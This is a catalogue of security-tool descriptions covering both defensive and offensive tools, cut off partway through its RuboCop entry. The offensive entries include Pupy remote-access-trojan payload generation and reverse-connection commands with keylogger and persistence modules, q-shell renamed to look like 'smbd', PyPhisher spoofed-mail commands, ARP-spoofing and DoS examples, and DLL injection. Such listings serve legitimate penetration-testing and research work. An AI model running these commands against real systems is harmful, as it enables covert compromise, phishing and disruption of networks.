Invoke-UserHunter               -   finds machines on the local domain where specified users are logged into, and can optionally check if the current user has local admin access to found machines
Invoke-StealthUserHunter        -   finds all file servers utilized in user HomeDirectories, and checks the sessions on each file server, hunting for particular users
Invoke-ProcessHunter            -   hunts for processes with a specific name or owned by a specific user on domain machines
Invoke-UserEventHunter          -   hunts for user logon events in domain controller event logs

Domain Trust Functions:

Get-NetDomainTrust              -   gets all trusts for the current user's domain
Get-NetForestTrust              -   gets all trusts for the forest associated with the current user's domain
Find-ForeignUser                -   enumerates users who are in groups outside of their principal domain
Find-ForeignGroup               -   enumerates all the members of a domain's groups and finds users that are outside of the queried domain
Invoke-MapDomainTrust           -   try to build a relational mapping of all domain trusts

MetaFunctions:

Invoke-ShareFinder              -   finds (non-standard) shares on hosts in the local domain
Invoke-FileFinder               -   finds potentially sensitive files on hosts in the local domain
Find-LocalAdminAccess           -   finds machines on the domain that the current user has local admin access to
Find-UserField                  -   searches a user field for a particular term
Find-ComputerField              -   searches a computer field for a particular term
Get-ExploitableSystem           -   finds systems likely vulnerable to common exploits
Invoke-EnumerateLocalAdmin      -   enumerates members of the local Administrators groups across all machines in the domain


Download PowerTools

ProGuard - Java class file Shrinker, Optimizer, Obfuscator and Preverifier


ProGuard is a free Java class file shrinker, optimizer, obfuscator, and preverifier. It detects and removes unused classes, fields, methods, and attributes. It optimizes bytecode and removes unused instructions. It renames the remaining classes, fields, and methods using short meaningless names. Finally, it preverifies the processed code for Java 6 or higher, or for Java Micro Edition. 

Some uses of ProGuard are:
  • Creating more compact code, for smaller code archives, faster transfer across networks, faster loading, and smaller memory footprints.
  • Making programs and libraries harder to reverse-engineer.
  • Listing dead code, so it can be removed from the source code.
  • Retargeting and preverifying existing class files for Java 6 or higher, to take full advantage of their faster class loading.

ProGuard's main advantage compared to other Java obfuscators is probably its compact template-based configuration. A few intuitive command line options or a simple configuration file are usually sufficient. The user manual explains all available options and shows examples of this powerful configuration style.

ProGuard is fast. It only takes seconds to process programs and libraries of several megabytes. The results section presents actual figures for a number of applications.

ProGuard is a command-line tool with an optional graphical user interface. It also comes with plugins for Ant, for Gradle, and for the JME Wireless Toolkit.


What is shrinking?

Java source code (.java files) is typically compiled to bytecode (.class files). Bytecode is more compact than Java source code, but it may still contain a lot of unused code, especially if it includes program libraries. Shrinking programs such as ProGuard can analyze bytecode and remove unused classes, fields, and methods. The program remains functionally equivalent, including the information given in exception stack traces.

What is obfuscation?

By default, compiled bytecode still contains a lot of debugging information: source file names, line numbers, field names, method names, argument names, variable names, etc. This information makes it straightforward to decompile the bytecode and reverse-engineer entire programs. Sometimes, this is not desirable. Obfuscators such as ProGuard can remove the debugging information and replace all names by meaningless character sequences, making it much harder to reverse-engineer the code. It further compacts the code as a bonus. The program remains functionally equivalent, except for the class names, method names, and line numbers given in exception stack traces.

What is preverification?

When loading class files, the class loader performs some sophisticated verification of the byte code. This analysis makes sure the code can't accidentally or intentionally break out of the sandbox of the virtual machine. Java Micro Edition and Java 6 introduced split verification. This means that the JME preverifier and the Java 6 compiler add preverification information to the class files (StackMap and StackMapTable attributes, respectively), in order to simplify the actual verification step for the class loader. Class files can then be loaded faster and in a more memory-efficient way. ProGuard can perform the preverification step too, which for instance allows older class files to be retargeted at Java 6.

What kind of optimizations does ProGuard support?

Apart from removing unused classes, fields, and methods in the shrinking step, ProGuard can also perform optimizations at the bytecode level, inside and across methods. Thanks to techniques like control flow analysis, data flow analysis, partial evaluation, static single assignment, global value numbering, and liveness analysis, ProGuard can:
  • Evaluate constant expressions.
  • Remove unnecessary field accesses and method calls.
  • Remove unnecessary branches.
  • Remove unnecessary comparisons and instanceof tests.
  • Remove unused code blocks.
  • Merge identical code blocks.
  • Reduce variable allocation.
  • Remove write-only fields and unused method parameters.
  • Inline constant fields, method parameters, and return values.
  • Inline methods that are short or only called once.
  • Simplify tail recursion calls.
  • Merge classes and interfaces.
  • Make methods private, static, and final when possible.
  • Make classes static and final when possible.
  • Replace interfaces that have single implementations.
  • Perform over 200 peephole optimizations, like replacing ...*2 by ...<<1.
  • Optionally remove logging code.
The positive effects of these optimizations will depend on your code and on the virtual machine on which the code is executed. Simple virtual machines may benefit more than advanced virtual machines with sophisticated JIT compilers. At the very least, your bytecode may become a bit smaller.
Some notable optimizations that aren't supported yet:
  • Moving constant expressions out of loops.
  • Optimizations that require escape analysis (DexGuard does).

Download ProGuard

Project Artillery - Full Suite for Protection against Attack on Linux and Windows


Project Artillery is an open source project aimed at the detection of early warning indicators and attacks. The concept is that Artillery will spawn multiple ports on a system giving the attacker the idea that multiple ports are exposed. Additionally, Artillery actively monitors the filesystem for changes, brute force attacks, and other indicators of compromise. Artillery is a full suite for protection against attack on Linux and Windows based devices. It can be used as an early warning indicator of attackers on your network. Additionally, Artillery integrates into threat intelligence feeds which can notify when a previously seen attacker IP address has been identified. Artillery supports multiple configuration types, different versions of Linux, and can be deployed across multiple systems and events sent centrally.

Artillery is a combination of a honeypot, monitoring tool, and alerting system. Eventually this will evolve into a hardening monitoring platform as well, to detect insecure configurations on *nix systems. It's relatively simple: run ./setup.py and hit yes. This will install Artillery in /var/artillery and edit your /etc/init.d/rc.local to start Artillery on boot.

Features
  1. It sets up multiple common ports that are attacked. If someone connects to these ports, it blacklists them forever (to remove blacklisted IPs, remove them from /var/artillery/banlist.txt)
  2. It monitors what folders you specify, by default it checks /var/www and /etc for modifications.
  3. It monitors the SSH logs and looks for brute force attempts.
  4. It will email you when attacks occur and let you know what the attack was.
Be sure to edit the /var/artillery/config to turn on mail delivery, brute force attempt customizations, and what folders to monitor.

Project structure

For those technical folks you can find all of the code in the following structure:
  • src/core.py - main central code reuse for things shared between each module
  • src/monitor.py - main monitoring module for changes to the filesystem
  • src/ssh_monitor.py - main monitoring module for SSH brute forcing
  • src/honeypot.py - main module for honeypot detection
  • src/harden.py - check for basic hardening to the OS
  • database/integrity.data - main database for maintaining sha512 hashes of filesystem
  • setup.py - copies files to /var/artillery/ then edits /etc/init.d/artillery to ensure artillery starts per each reboot

Supported platforms
  • Linux
  • Windows

Proxenet - Hacker Friendly Proxy for Web Application Penetration Tests


Proxenet is a hacker friendly proxy for web application penetration tests.

proxenet is a multi-threaded proxy which allows you to manipulate your HTTP requests and responses using your favorite scripting language. No need to learn Java (like for Burp) or Python (like for mitmproxy). proxenet supports heaps of languages (see the section "Language Versions") and more can be easily added.

proxenet is not script kiddie friendly, neither GUI friendly. If this is what you are looking for, here are a few links for you:
Or the best way, write your own GUI as a proxenet plugin!

Why ?

The idea behind proxenet came after a lot of frustration from attempting to write extensions for Burp. Moreover, only a few existing proxies support adding new extensions, and when they do, they are tied to one language, despite Burp's persistent attempts to make unnatural bindings (Python over Java or, worse, Ruby over Java).

Being written in pure C, it is fast, efficient and easily pluggable to anything else. It is the ultimate real DIY web proxy for pentest(ers).

Features

Here is a sample of features already supported by proxenet:
  • Written in C
    • Fast (heavy thread use)
    • Efficient (POSIX compatible)
    • Low memory footprint (for the core)
  • Can interact with any language
  • Provides plugins support for the following languages:
    • C
    • Python
    • Lua
    • Ruby
    • Perl
    • Tcl
    • Java
  • SSL
    • Full SSL interception (internal CA)
    • SSL client certificate authentication
  • IPv4/IPv6
  • HTTP Proxy forwarding
  • White-list/Black-list hosts filtering
  • Command interface out-of-band
  • Nice TTY colors :D
  • 100% Open-Source
... and more !

The best of both worlds?

Some people might miss the beautiful interface some other GUI-friendly proxies provide. So be it! Plug proxenet as a relay behind your favorite Burp, Zap, Proxystrike, burst, etc. and enjoy the show!

How to start
$ git clone https://github.com/hugsy/proxenet.git
$ cd proxenet && cmake . && make


ProxyDroid - Set Proxys (Http / Socks4 / Socks5) on your Android devices


ProxyDroid is an app that can help you to set the proxy (http / socks4 / socks5) on your android devices.

FEATURES
  1. Support HTTP / HTTPS / SOCKS4 / SOCKS5 proxy
  2. Support basic / NTLM / NTLMv2 authentication methods
  3. Individual proxy for only one or several apps
  4. Multiple profiles support
  5. Bind configuration to WIFI's SSID / Mobile Network (2G / 3G)
  6. Widgets for quickly switching on/off proxy
  7. Low battery and memory consumption (written in C and compiled as native binary)
  8. Bypass custom IP address
  9. DNS proxy for users behind a firewall that disallows resolving external addresses
  10. PAC file support (only basic support, thanks to Rhino)

Download ProxyDroid

Pupy - Multi-Platform Remote Administration Tool

Pupy is an open-source, multi-platform Remote Administration Tool written in Python. On Windows, Pupy uses reflective DLL injection and leaves no traces on disk.

Features :
  • On windows, the Pupy payload is compiled as a reflective DLL and the whole python interpreter is loaded from memory. Pupy does not touch the disk :)
  • Pupy can reflectively migrate into other processes
  • Pupy can remotely import, from memory, pure python packages (.py, .pyc) and compiled python C extensions (.pyd). The imported python modules do not touch the disk. (.pyd memory import currently works on Windows only; .so memory import is not implemented.)
  • modules are quite simple to write and pupy is easily extensible.
  • Pupy uses rpyc and a module can directly access python objects on the remote client
    • we can also access remote objects interactively from the pupy shell and even auto completion of remote attributes works !
  • communication channel currently works as a ssl reverse connection, but a bind payload will be implemented in the future
  • all the non interactive modules can be dispatched on multiple hosts in one command
  • Multi-platform (tested on windows 7, windows xp, kali linux, ubuntu)
  • modules can be executed as background jobs
  • commands and scripts running on remote hosts are interruptible
  • auto-completion and nice colored output :-)
  • commands aliases can be defined in the config

Implemented Modules :
  • migrate (windows only)
    • inter process architecture injection also works (x86->x64 and x64->x86)
  • keylogger (windows only)
  • persistence (windows only)
  • screenshot (windows only)
  • webcam snapshot (windows only)
  • command execution
  • download
  • upload
  • socks5 proxy
  • local port forwarding
  • interactive shell (cmd.exe, /bin/sh, ...)
  • interactive python shell
  • shellcode exec (thanks to @byt3bl33d3r)

Quick start

In these examples the server is running on a Linux host (tested on Kali Linux) and its IP address is 192.168.0.1
The clients have been tested on (Windows 7, Windows XP, kali linux, ubuntu, Mac OS X 10.10.5)

generate/run a payload
for Windows
./genpayload.py 192.168.0.1 -p 443 -t exe_x86 -o pupyx86.exe
you can also use -t dll_x86 or dll_x64 to generate a reflective DLL and inject/load it by your own means.

for Linux
pip install rpyc #(or manually copy it if you are not admin)
python reverse_ssl.py 192.168.0.1:443

for MAC OS X
easy_install rpyc #(or manually copy it if you are not admin)
python reverse_ssl.py 192.168.0.1:443

start the server
  1. optionally edit pupy.conf to change the bind address / port
  2. start the pupy server :
./pupysh.py

Some screenshots (images not reproduced here; captions only):
  • list connected clients
  • help
  • execute python code on all clients
  • execute a command on all clients, exception is retrieved in case the command does not exist
  • use a filter to send a module only on selected clients
  • migrate into another process
  • interactive shell
  • interactive python shell


example: How to write a MsgBox module

first of all write the function/class you want to import on the remote client
in the example we create the file pupy/packages/windows/all/pupwinutils/msgbox.py
import ctypes
import threading

def MessageBox(text, title):
    # MessageBoxA blocks until the box is dismissed, so run it on a daemon
    # thread; otherwise the client's rpyc loop would hang on this call
    t = threading.Thread(target=ctypes.windll.user32.MessageBoxA, args=(None, text, title, 0))
    t.daemon = True
    t.start()

then, simply create a module to load our package and call the function remotely
from pupylib.PupyModule import *   # provides PupyModule, PupyArgumentParser, windows_only

__class_name__ = "MsgBoxPopup"      # name of the module class the loader should expose

class MsgBoxPopup(PupyModule):
    """ Pop up a custom message box """

    def init_argparse(self):
        self.arg_parser = PupyArgumentParser(prog="msgbox", description=self.__doc__)
        self.arg_parser.add_argument('--title', help='msgbox title')
        self.arg_parser.add_argument('text', help='text to print in the msgbox :)')

    @windows_only
    def is_compatible(self):
        pass

    def run(self, args):
        # push the package to the client (in memory), then call into it over rpyc
        self.client.load_package("pupwinutils.msgbox")
        self.client.conn.modules['pupwinutils.msgbox'].MessageBox(args.text, args.title)
        self.log("message box popped !")

Dependencies

rpyc (https://github.com/tomerfiliba/rpyc)

Roadmap and ideas

Some ideas without any priority order
  • support for https proxy
  • bind instead of reverse connection
  • add offline options to payloads like enable/disable certificate checking, embed offline modules (persistence, keylogger, ...), etc...
  • integrate scapy in the windows dll :D (that would be fun)
  • work on stealthiness and modules under unix systems
  • webcam snap
  • mic recording
  • socks5 udp support
  • remote port forwarding
  • perhaps write some documentation
  • ...
  • any cool idea ?

Pyersinia - Network Attack Tool

Pyersinia is a tool similar to Yersinia, but Pyersinia is implemented in Python using Scapy. The main objective is the realization of network attacks such as ARP spoofing, DHCP DoS and STP DoS, among others. The community can add new attacks to the tool in a simple way, using plugins. This is because Pyersinia uses the STB (Security Tools Builder) framework.

What's new?

Adding new attacks on the tool is a simple task because we use the framework STB (Security Tool Builder). The new attacks are added by plugins.

Installation

Installing pyersinia is easy:
$ python -m pip install pyersinia
Or install from Pypi:
# pip install pyersinia

Quick start

You can display the inline help by running the tool with -h; it looks like this:

positional arguments:
  arp_spoof_TARGET
  arp_spoof_VICTIM

optional arguments:
  -h, --help        show this help message and exit
  -v, --verbosity   verbosity level
  -a ATTACK_TYPE    choose supported attack type
  -i IFACE          choose network interface

supported attacks:
        arp_spoof, dhcp_discover_dos, stp_tcn, stp_conf, stp_root

examples:
        python pyersinia.py -a arp_spoof 127.0.0.1 127.0.0.1
        python pyersinia.py -a stp_root -i eth0


Download Pyersinia

PyPhisher - A Simple Python Tool for Phishing

If you are looking to do phishing testing or a demonstration, you can check PyPhisher. This tool was created for the purpose of phishing during a penetration test. It is Python based and provides the user a way to send emails with a customized template that they design. You can use an HTML layout that resembles any organization's and replace the links that you want to send.

This was inspired by SpearPhisher beta by Dave Kennedy from TrustedSec and a feature found in Cobalt Strike by Raphael Mudge from Strategic Cyber.

Usage:
PyPhisher.py --server mail.server.com --port 25 --username user --password password --html phish.txt --url_replace phishlink.com --subject Read!! --sender important@phish.com --sendto target@company.com

Available options:
--server          The SMTP server that you are going to be using to send the email
--port            The port number that is setup for SMTP
--html            The pre-crafted html that will be used in the email
--url_replace     The url that will be used to replace all links in the email
--subject         The subject that will appear in the email message
--sender          The sender address that will appear on the email
--sendto          Who you would like to send the email to


Download PyPhisher

Q-shell - Quick Shell for Unix Administrator

q-shell is a quick shell for remote login into Unix systems. It uses the Blowfish cipher to protect data in transit between client and server. You get two programs: 'qsh' for the client and 'qshd' for the server; these programs can be renamed to any name you prefer.

Compile

Just enter 'make' and it will compile automatically, but you must input the server key.

Usage
  1. server:
    Just run qshd on server:
       $ ./qshd
    
    But you may want to rename it before running, such as:
       $ mv qshd smbd
       $ export PATH=.:$PATH
       $ smbd
    
  2. client:
    Set some environment variable, then run qsh:
      $ export _IP=127.0.0.1
      $ export _PORT=2800
      $ unset _P
      $ ./qsh shell
    
    You are now logged into server $_IP.

More function

q-shell includes more functions to manage systems:

  1. put/get files:
    $ ./qsh get /path/to/server/file .
    $ ./qsh put /path/to/local/file  /path/to/server/file
    
  2. run a command on server:
    $ ./qsh exec 'ls -l /bin'
    
  3. update server program:
    $ ./qsh update /path/to/local/qshd
    
    This updates the remote qshd and restarts it.
  4. automatically run a command on many servers:
    $ for i in {10..20} ; do
          export _IP=192.168.0.$i
          export _PORT=2800
          export _P=key   # set key
          ./qsh exec 'ls -l /bin'
      done
    
    Note: qsh uses $_P to fetch the server key, so you should clear your shell history after using $_P.
  5. update password
    Starting with version 3.2, you can update the password as below:
      $ ./qsh passwd
    


Download Q-shell

QARK - Tool to look for several security related Android application vulnerabilities


Quick Android Review Kit - This tool is designed to look for several security related Android application vulnerabilities, either in source code or packaged APKs. The tool is also capable of creating "Proof-of-Concept" deployable APKs and/or ADB commands, capable of exploiting many of the vulnerabilities it finds. There is no need to root the test device, as this tool focuses on vulnerabilities that can be exploited under otherwise secure conditions.

Usage
To run in interactive mode:
$ python qark.py
To run in headless mode:
$ python qark.py --source 1 --pathtoapk /Users/foo/qark/sampleApps/goatdroid/goatdroid.apk --exploit 1 --install 1
or
$ python qark.py --source 2 -c /Users/foo/qark/sampleApps/goatdroid/goatdroid --manifest /Users/foo/qark/sampleApps/goatdroid/goatdroid/AndroidManifest.xml --exploit 1 --install 1
The sampleApps folder contains sample APKs that you can test against QARK

Requirements
  • python 2.7.6
  • JRE 1.6+ (preferably 1.7+)
  • OSX or Ubuntu Linux (Others may work, but not fully tested)

Documentation
QARK is an easy to use tool capable of finding common security vulnerabilities in Android applications. Unlike commercial products, it is 100% free to use. QARK features educational information allowing security reviewers to locate precise, in-depth explanations of the vulnerabilities. QARK automates the use of multiple decompilers, leveraging their combined outputs, to produce superior results, when decompiling APKs. Finally, the major advantage QARK has over traditional tools, that just point you to possible vulnerabilities, is that it can produce ADB commands, or even fully functional APKs, that turn hypothetical vulnerabilities into working "POC" exploits.
Included in the types of security vulnerabilities this tool attempts to find are:
  • Inadvertently exported components
  • Improperly protected exported components
  • Intents which are vulnerable to interception or eavesdropping
  • Improper x.509 certificate validation
  • Creation of world-readable or world-writeable files
  • Activities which may leak data
  • The use of Sticky Intents
  • Insecurely created Pending Intents
  • Sending of insecure Broadcast Intents
  • Private keys embedded in the source
  • Weak or improper cryptography use
  • Potentially exploitable WebView configurations
  • Exported Preference Activities
  • Tapjacking
  • Apps which enable backups
  • Apps which are debuggable
  • Apps supporting outdated API versions, with known vulnerabilities

Roadmap
Things that are coming soon:
  • Rewrite of code to support extensibility
  • Bound Service vulnerability detection and exploitation
  • Content Provider vulnerability detection and exploitation
  • Additional WebView configuration demonstrations
  • Static Tapjacking mitigation detection
  • File browser capable of using root permissions

Download QARK

RAWR - Rapid Assessment of Web Resources


  Features
  • A customizable CSV containing ordered information gathered for each host, with a field for making notes/etc.
  • An elegant, searchable, JQuery-driven HTML report that shows screenshots, diagrams, and other information.
  • A report on relevant security headers, courtesy of SmeegeSec.
  • A CSV Threat Matrix for an easy view of open ports across all provided hosts. (Use -a to show all ports.)
  • A wordlist for each host, comprised of all words found in responses (including crawl, if used).
  • Default password suggestions through checking a service's CPE for matches in the DPE Database.
  • A shelve database of all host information. (planned comparison functionality)
  • Parses meta-data in documents and photos using customizable modules.
  • Supports the use of a proxy (Burp, Zap, W3aF)
  • Captures/stores SSL Certificates, Cookies, and Cross-domain.xml
  • [Optional] Customizable crawl of links within the host's domain.
  • [Optional] PNG Diagram of all pages found during crawl
  • [Optional] List of links crawled in tiered format.
  • [Optional] List of documents seen for each site.
  • [Optional] Automation-Friendly output (JSON strings)

  Input
    • Using Prior Scan Data
      • -c <RAWR .cfg file>
        • .cfg files containing that scan's settings are created for every run.

      • -f <file, csv list of files, or directory>
        • It will parse the following formats:
        • NMap - XML (requires -sV)
        • Nessus - XML v2 (requires "Service Detection" plugin)
        • Metasploit - CSV
        • Qualys - Port Services Report CSV
        • Qualys - Asset Search XML (requires QIDs 86000,86001,86002)
        • Nexpose - Simple XML, XML, XML v2
        • OpenVAS - XML

    • Using NMap
      • RAWR accepts valid NMap input strings (CIDR, etc) as an argument
        • -i can be used to feed it a line-delimited list.
      • use -t <timing> and/or -s <source port>
      • use -p <port|all|fuzzdb> to specify port #(s), all for 1-65353, or fuzzdb to use the FuzzDB Common Ports
      • --ssl will call enum-ciphers.nse for more in-depth SSL data.

  Enumeration
    • In [conf/settings.py], 'flist' defines the fields that will be in the CSV as well as the report.
      • The section at the bottom - "DISABLED COLUMNS" is a list of interesting data points that are not shown by default.

    • --dns will have it query Bing for other hostnames and add them to the queue.
      • (Planned) If IP is non-routable, RAWR will request an AXFR using 'dig'
      • This is for external resources - non-routables are skipped.
      • Results are cached for the duration of the scan to prevent unneeded calls.

    • -o, -r, and -x make additional calls to grab HTTP OPTIONS, robots.txt, and crossdomain.xml, respectively

    • Try --downgrade to make requests with HTTP/1.0
      • Possible to glean more info from the 'chattier' version
      • Screenshots are still made via HTTP/1.1, so expect that when viewing the traffic.

    • --noss will omit the collection of screenshots
      • The HTML report still functions, but will show the '!' image for all hosts.

    • Proxy your requests with --proxy=<ip:port>
      • This works well with BurpSuite, Zap, or W3aF.

    • Crawl the site with --spider, notating files and docs in the log directory's 'maps' folder.
      • Defaults: [conf/settings.py] follow subdomains, 3 links deep, timeout at 3min, limit to 300 urls
      • If graphviz and python-graphviz are installed, it will create a PNG diagram of each site that is crawled.
      • Start small and make adjustments outward in respect to your scanning environment. Please use caution to avoid trouble. :)

    • Use -S <1-5> to apply one of the crawl intensity presets. The default is 3.

    • --mirror is the same as --spider, but will also make a copy of each site during the crawl.

    • Use --spider-opts <opts> to define crawl settings on the fly.
      • 's' = 'follow subdomains', 'd' = depth, 't' = timeout, 'l' = url limit
      • Not all are required, nor do they have to be in any particular order.
      • Example: --spider-opts s:false,d:2,l:500

    • Also for spidering, --alt-domains <domains> will whitelist domains you want to follow during the crawl.
      • By default, it won't leave the originating domain.
      • Example: --alt-domains domain1.com,domain2.com,domain3.com
      • --blacklist-urls <input list> will blacklist domains you don't want to crawl.

  Output
    • -a is used to include all open ports in the CSV output and the Threat Matrix.

    • -m will create the Threat Matrix from provided input and exit (no scan).

    • -d <folder> changes the log folder's location from the default "./"
      • Example: -d ./Desktop/RAWR_scans_20140227 will create that folder and use it as your log dir.

    • -q or --quiet mutes display of the dinosaur on run.
      • Still in disbelief that anyone would want this... made 2 switches for it, to show that I'm a good sport. :)

    • Compress the log folder when the scan is complete with -z.

    • --json and --json-min are the automation-friendly outputs from RAWR.
      • --json only kicks out JSON lines to STDOUT, while still creating all of the normal output files.
      • --json-min creates no output files, only JSON strings to STDOUT

    • Use --parsertest if you're testing a custom parser. It parses input, displays the first 3 lines, and quits.

    • -v makes output verbose.

  Report Customization
    • -e excludes the 'Default password suggestions' from your output.
      • This was suggested as an 'Executive' option.

    • Give your HTML report a custom logo and title with --logo=<file> and --title=<title>.
      • The image will be copied into the report folder.
      • Click 'printable' in the HTML report to view the custom header.

    Updating
    • -u runs update and prompts if a file is older than the current version.
      • Files downloaded are defpass.csv and Ip2Country.tar.gz.
      • It checks for phantomJS and will download after prompting.

    • -U runs update and downloads the files mentioned above regardless of their version, without prompting.

    Rekall - The Most Complete Memory Analysis Framework


    The Rekall Framework is a completely open collection of tools, implemented in Python under the GNU General Public License, for the extraction of digital artifacts from volatile memory (RAM) samples. The extraction techniques are performed completely independently of the system being investigated, but offer visibility into the runtime state of the system. The framework is intended to introduce people to the techniques and complexities associated with extracting digital artifacts from volatile memory samples and to provide a platform for further work into this exciting area of research.

    The Rekall distribution is available from: http://www.rekall-forensic.com/
    Rekall should run on any platform that supports Python (http://www.python.org)

    Rekall supports investigations of the following 32-bit and 64-bit x86 memory images:
    • Microsoft Windows XP Service Pack 2 and 3
    • Microsoft Windows 7 Service Pack 0 and 1
    • Linux Kernels 2.6.24 to 3.10.
    • OSX 10.6-10.8.
    Rekall also provides a complete memory sample acquisition capability for all major operating systems (see the tools directory).

    Quick start

    Rekall is available as a python package installable via the pip package manager. Simply type (for example on Linux):
    sudo pip install rekall
    You might need to specifically allow pre-release software to be included (until Rekall makes a major stable release):
    sudo pip install --pre rekall
    This installs Rekall together with all of its dependencies. You still need to have python and pip installed first.
    To be able to run the ipython notebook, the following are also required:
    pip install Jinja2 MarkupSafe Pygments astroid pyzmq tornado wsgiref
    For Windows, Rekall is also available as a self-contained installer package. Please check the download page for the most appropriate installer to use.

    Development version

    For development it is easier to install Rekall inside a virtualenv. virtualenv is a way of containing and running multiple versions of python packages at the same time, without interfering with the host system.
    # You might need to install virtualenv:
    $ sudo apt-get install python-virtualenv
    
    # This will build a new empty python environment.
    $ virtualenv /tmp/Test
    
    # Now we switch to the environment - all python code runs from here.
    $ source /tmp/Test/bin/activate
    
    # This will install all dependencies into the virtual environment.
    $ pip install --pre rekall
    
    # For development run the devel version
    $ git clone https://github.com/google/rekall.git
    $ cd rekall
    $ python setup.py develop
    When done you can just remove the /tmp/Test directory.


    REMnux v6 - A Linux Toolkit for Reverse-Engineering and Analyzing Malware


    REMnux is a free Linux toolkit for assisting malware analysts with reverse-engineering malicious software. It strives to make it easier for forensic investigators and incident responders to start using the variety of freely-available tools that can examine malware, yet might be difficult to locate or set up.

    The heart of the project is the REMnux Linux distribution based on Ubuntu. This lightweight distro incorporates many tools for analyzing Windows and Linux malware, examining browser-based threats such as obfuscated JavaScript, exploring suspicious document files and taking apart other malicious artifacts. Investigators can also use the distro to intercept suspicious network traffic in an isolated lab when performing behavioral malware analysis.

    Malware Analysis Tools Installed on REMnux

    The REMnux distribution includes many free tools useful for examining malicious software. These utilities are set up and tested to make it easier for you to perform malware analysis tasks without needing to figure out how to install them. The majority of these tools are listed below.

    Examine Browser Malware

    Examine Document Files

    Extract and Decode Artifacts

    Handle Network Interactions

    Process Multiple Samples

    Examine File Properties and Contents

    Investigate Linux Malware

    Edit and View Files

    Examine Memory Snapshots

    Statically Examine PE Files

    Investigate Mobile Malware

    Perform Other Tasks

    REMnux Documentation 

    REMnux documentation is a relatively recent effort, which can provide additional details regarding the toolkit. The document set is in need of improvement and expansion.

    The one-page REMnux cheat sheet highlights some of the most useful tools and commands available as part of the REMnux distro. It’s an especially nice starting point for people who are new to the distribution. 


    Download REMnux v6

    Remote DLL Injector v2.0 - Command-line Tool to Inject DLL into Remote Process


    Remote DLL Injector is a free command-line tool to inject a DLL into a remote process. Currently it supports DLL injection using the CreateRemoteThread technique.

    Being a command-line tool makes it easy to integrate into your automation scripts. It is also useful when you are operating on a system remotely, especially during penetration tests.

    One of the unique features of Remote DLL Injector is its ability to inject a DLL into ASLR-enabled processes. It dynamically calculates DLL and function offsets within the target process before the injection operation.

    It is fully portable and includes both 32-bit and 64-bit versions. It has been successfully tested on all platforms from Windows XP to Windows 8.

    How to use?

    Remote DLL Injector is a command-line tool, so it must be launched from a cmd prompt as shown below.

    Note that it ships with 32-bit and 64-bit versions. To inject a DLL into a 32-bit process (on a 32-bit or 64-bit platform) use RemoteDLLInjector32.exe; for a 64-bit process use RemoteDLLInjector64.exe. The DLL must be built for the same bitness as the target process, since a process cannot load a DLL of the other bitness.

    Here is the usage information:
       RemoteDLLInjector.exe  <pid>  <dll_file_path>       
            -h                This help screen
            <pid>             Process ID of remote process to Inject DLL
            <dll_file_path>   Full path of DLL to be injected

    Examples of RemoteDLLInjector
    //Show the help screen
    RemoteDLLInjector.exe -h
     
    //Inject DLL into 32-bit process with pid 1551
    RemoteDLLInjector32.exe 1551 "c:\my project\inject32.dll"
     
    //Inject DLL into 64-bit process with pid 1001
    RemoteDLLInjector64.exe 1001 "c:\inject64.dll"


    Download Remote DLL Injector

    REXT - Router Exploitation Toolkit

    Small toolkit for easy creation and usage of various python scripts that work with embedded devices.
    • core - contains most of the toolkit's basic functions
    • databases - contains databases, like default credentials etc.
    • interface - contains the code used to create and drive the interface
    • modules - contains the loadable modules; every module contains vendor-specific sub-modules where the scripts are stored.
      • decryptors
      • exploits
      • harvesters
      • misc
      • scanners
    • output - output goes here
    This is still heavily work in progress.

    Requirements
    I am trying to keep the requirements minimal:
    • requests


    Download REXT

    RouterCheck - Android app for ensuring the safety of your Router


    RouterCheck is a system for ensuring the well-being of your router and home network. It’s offered as a smartphone app, but is far more than just a simple smartphone app. RouterCheck communicates with a powerful server that helps to check whether your router is vulnerable to any of the latest attacks that hackers are launching.

    RouterCheck is Security for Your Home Router

    RouterCheck is so easy to use, yet performs some very advanced tests to ensure the safety of your home network. Simply start RouterCheck and the following things will automatically be tested for:

    Check your configuration

    Routers are complex devices and their configuration is sometimes difficult to understand. The configuration screens have many options, and it isn’t always clear what the effects of choosing an option will have on your network’s security. RouterCheck makes sure that you haven’t accidentally enabled something dangerous.

    Passwords

    RouterCheck will check whether you're still using your router's default password (very dangerous) or a password that's on hackers' lists of common passwords to try. To learn more about password danger click Passwords.

    Dangerous things enabled

    RouterCheck will see whether you’ve enabled things that are “dangerous” such as UPnP or Remote Administration. If you have, RouterCheck will explain the security implications of this so that you can make an informed decision on what to do.

    Running the latest firmware

    RouterCheck checks that your router is updated with the latest firmware for your model, and if not, what steps you can take to update it.

    Vulnerabilities in your router

    RouterCheck will look through several lists of known vulnerabilities for your router model/firmware to see whether there are any known problems. It will also perform some of the same tests that hackers use to see how your router will respond.

    Open Ports

    RouterCheck will see if your network has any ports opened to the internet as a result of Port Forwarding. If there are and you have good reason to have the port opened, you can configure RouterCheck so that it will not flag this situation as an issue in the future.

    DNS is set up properly

    When home networks are attacked, the router's DNS configuration is a common target. It's very important that your DNS is reliable and trustworthy, otherwise all of the computers on your network are at risk.
    RouterCheck has several ways to check and ensure that the DNS servers that you’re using are reliable.

    Has the router been tampered with?

    RouterCheck will run some tests on your router to help determine if other things in the router have been tampered with by hackers.

    Are you a target?

    RouterCheck will look to see whether you’re on any of the common lists of targets that hackers typically use when looking for devices on the internet that are poorly secured and at risk.

    Resolution

    When RouterCheck finds that there are any problems with your router, it will help guide you towards the steps you must take to solve the problem.

    Checking public WiFi hotspots

    Do you ever use WiFi at a coffeeshop, restaurant or other public place? The dangers of using public WiFi are well understood and one of the issues is the reliability of the system’s DNS server. If a hacker were successful in compromising a coffeeshop router’s DNS settings, everyone who used the service would unknowingly become innocent victims.

    RouterCheck allows you to quickly scan a public WiFi hotspot to ensure that the system is safe to use.


    Rubocop - A Ruby Static Code Analyzer, Based On The Community Ruby Style Guide


    RuboCop is a Ruby static code analyzer. Out of the box it will enforce many of the guidelines outlined in the community Ruby Style Guide.

    Most aspects of its behavior can be tweaked via various configuration options.

    Installation
    RuboCop's installation is pretty standard:
    $ gem install rubocop
    
    If you'd rather install RuboCop using bundler, don't require it in your Gemfile:
    gem 'rubocop', require: false
    

    Basic Usage
    Running rubocop with no arguments will check all Ruby source files in the current directory:
    $ rubocop
    
    Alternatively you can pass rubocop a list of files and directories to check:
    $ rubocop app spec lib/something.rb
    
    Here's RuboCop in action. Consider the following Ruby source code:
    def badName
      if something
        test
        end
    end
    Running RuboCop on it (assuming it's in a file named test.rb) would produce the following report:
    Inspecting 1 file
    W
    
    Offenses:
    
    test.rb:1:5: C: Use snake_case for method names.
    def badName
        ^^^^^^^
